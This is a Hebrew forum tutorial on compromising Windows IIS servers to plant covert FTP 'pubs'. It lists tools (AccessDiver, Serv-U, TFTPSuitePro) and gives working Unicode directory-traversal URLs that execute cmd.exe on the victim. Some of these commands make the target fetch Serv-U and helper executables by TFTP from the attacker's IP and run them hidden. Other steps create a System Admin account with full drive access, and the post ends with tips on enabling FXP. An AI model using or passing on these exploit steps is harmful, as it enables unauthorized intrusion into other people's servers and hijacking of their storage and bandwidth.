כלים:
phack
לינק:
Serv-U Ftp Server
לינק:
http://www.serv-u.com/-גרסת 3+ חובה!!!
TFTPSuitePro2000
לינק:
http://www.walusoft.co.uk/
AccessDiver 4.5+
לינק:
http://www.accessdiver.com/ -גרסה 4.5 ומעלה!!!
ההתקנה
תכין תיקיה בכונן :c שלך בשם FTP ושפוך לתוכה את PHACK.zip
תתקין את Serv-U
תתקין את TFTPSuite ובהתקנה בחר רק את SERVER
תתקין את Access Diver
עכשיו תעתיק את הקובץ ServUDaemon.ini מ c:/FTP ל- c:\program files\serv-u (או איפה שהתקנה את Serv-U) ודרוס את הקובץ.
פתח את Serv-u Admin
התקנת Serv-U
http://planet.nana.co.il/timor5/תמונות%20למדריך/מדריך%20לפריצת%20פאבים/pubha11%2Ejpg
לחץ על Domains ואתה אמור לראות את ה FTP לחץ פעמיים על FTP
לחץ על FTP ובחר איזה פורט אתה רוצה שפאב היה ושאתה מסיים תעשה קליק ימני ו Apply.
עכשיו תלך ל Settings שם אתה תוכל לשנות את המספר משתמשים ועוד כמה שטויות.... ושאתה מסיים לחץ קליק ימני ו Apply.
לך ל Users קליק ימני על הקופסה של ה- Users ולחץ על New User.
בחר את היוזר ואת הסיסמא שאתה רוצה שהיה וב-Home Directory תרשום C:/ ובחר NO ב- Lock Users In Home Directory
אתה תהיה במסך של היוזר שלך, ב-Privilege בחר ב System Admin אתה יכול לשחק בהגדרות ב General זה לא כול כך חשוב .
לך ללשונית Dir Access וסמן את כ כול האפשריות שיש בצד ימין, ואז קליק ימני על היוזר ולחץ על Apply .
רצוי שתעשו עוד יוזר שהיה לכולם:
אז תעשו יוזר חדש כמו מקודם אבל ב diracces סמן הכול ב-V חוץ מהאפשרות של ה Delete כדאי שלא יוכלו למחוק לכם כלום
תעתיק את ה-ServUDaemon.ini מהתיקיה של Serv-U ל C:/FTP (דרוס את הקובץ)
התקנת TFTPSuitePro
התוכנה אמורה להיראות ככה:
http://planet.nana.co.il/timor5/תמונות%20למדריך/מדריך%20לפריצת%20פאבים/pubha12%2Ejpg
עכשיו לחץ על System->Setup וב- Inbound Path File , לחץ על Browse וסמן את C:\FTP שהכנו ולחץ OK.
אותו דבר ל-Outbound.
הפריצה
עכשיו פתח את Access Diver ולחץ בפינה השמאלית על My Skill->EXPLOITER.
לך ללשונית Exploiter ובפינה השמאלית יש סמל של תיקיה לחץ עלי לך לתיקיה C:/FTP שלנו ולחץ על IIS.INI.
עכשיו איפה שרשום Server צריך לרשום את כתובת הפאב עם http:// בהתחלה דוגמא: http://xxx.xxx.xxx.xx עכשיו לחץ על Scan
אחרי הסריקה את תראה שבכול שורה נהיה לינק.
http://planet.nana.co.il/timor5/תמונות%20למדריך/מדריך%20לפריצת%20פאבים/pubha13%2Ejpg
עם לאחד הלינקים יש סיומת (502) זה אומר שהפאב פריץ, עכשיו לחץ על אחד מהלינקים עם סיומת (502) ולחץ על העין בצד ימין.
עכשיו אמור להפתח לך האקספלואר והכתובת אמורה להראות ככה:./http://xxx.xxx.xxx.xx/scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c
עכשיו החלק הצהוב הוא ה-UniCode זה תלוי מאוד על איזה לינק עם (502) בחרתה.
עכשיו נחלק את ה-UniCode:
/:scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c/
החלק האדום הוא החלק הראשון של ה-UniCode והחלק הירוק הוא הפקודה או החלק השני של ה-UniCode
עכשיו שים לב שה-TftpSuitePro פועל.
עכשיו אנחנו צריכים לעלות את הקבצים של Serv-u לפאב
כך את החלק השני של ה-UniCode (החלק הירוק שבדרך כלל מתחיל ב- winnt) מחק אותו ותכניס את השורה הזאת:
winnt/system32/cmd.exe?/c+c:\winnt\system32\tftp.exe+"-i"+YourIPHere+get+WINMGNT.EXE+c:\WINMGNT.EXE
תשים לב שהכנסתה את ה-YourIPHere לשורה.
עכשיו אם אתה משתמש בסרבר שלי השורה צריכה להראות ככה:
http://xxx.xxx.xxx.xx/scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+c:\winnt\system32\tftp.exe+%22-i%22+YourIPHere+get+WINMGNT.EXE+c:\WINMGNT.EXE
שים את השורה באקספלואר ולחץ אנטר, עכשיו אתה אמור לראות ש TFTPSuitePro מעלה את הקובץ WINMGNT.EXE
שזה גומר להעלות את WINMGNT.EXE מיחקו איפה שכתוב WINMGNT.EXE בשורה הגדולה ובמקום זה שימו את הקובץ KILL.EXE וכך גם עם הקבצים:
WINLOGIN.EXE ו servudaemon.ini ו TLIST.EXE
עכשיו אחרי ש-TFTPSuitePro יעלה את כול הקבצים כך את השורה מההתחלה תוריד ממנה את החלק השני של ה-UniCode ותוסיף את השורה הבאה:
winnt/system32/cmd.exe?/c+c:\WINMGNT.EXE%20/h
ושים באקספלואר, עכשיו אם אתה משתמש בסרבר שלי זה השורה אמורה להראות ככה:
http://xxx.xxx.xxx.xx/scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+c:\WINMGNT.EXE%20/h
זה יקח זמן עד שהדף יטען אז לחץ על Stop אחרי 10 שניות
עכשיו הפאב צריך להתחיל לעבוד!!
בשביל לבדוק עם הפאב פועל תכנס אליו עם פורט היוזר והסיסמא שבחרתה.
שליטה על פאב
פתח את ה-Servu Admin לחץ על ה-Servu Servers למעלה ולחץ על New Server
עכשיו תכניס את האי פי של הפאב שפרצתה את הפורט שבחרנו מקודם בחר שם לשרת שים את היוזר והסיסמא שבחרנו ממקודם.
עכשיו אתה תראה אותו תחת Local Server עכשיו אתה יכול להוסיף יוזרים לשנות הגדרות אבל אל תשכח שאחרי כול דבר שאתה משנה\מוסיף בפאב את צריך ללחוץ קליק ימני ו- Apply.
בקרוב אני מוסיף עוד פקודות לשליטה על הפאב.
טיפים
בשביל שהפאב שלכם היה תומך FXP אתם צריכים ללכת ב Serv-U ל-settings ואז להוריד את ה-V ב-Block "FTP_bounce" Attacs and FXP
תהנו....
גירסת הדפסה
סגן המנהל
מפקח
Winner
צל"ש
מומחה
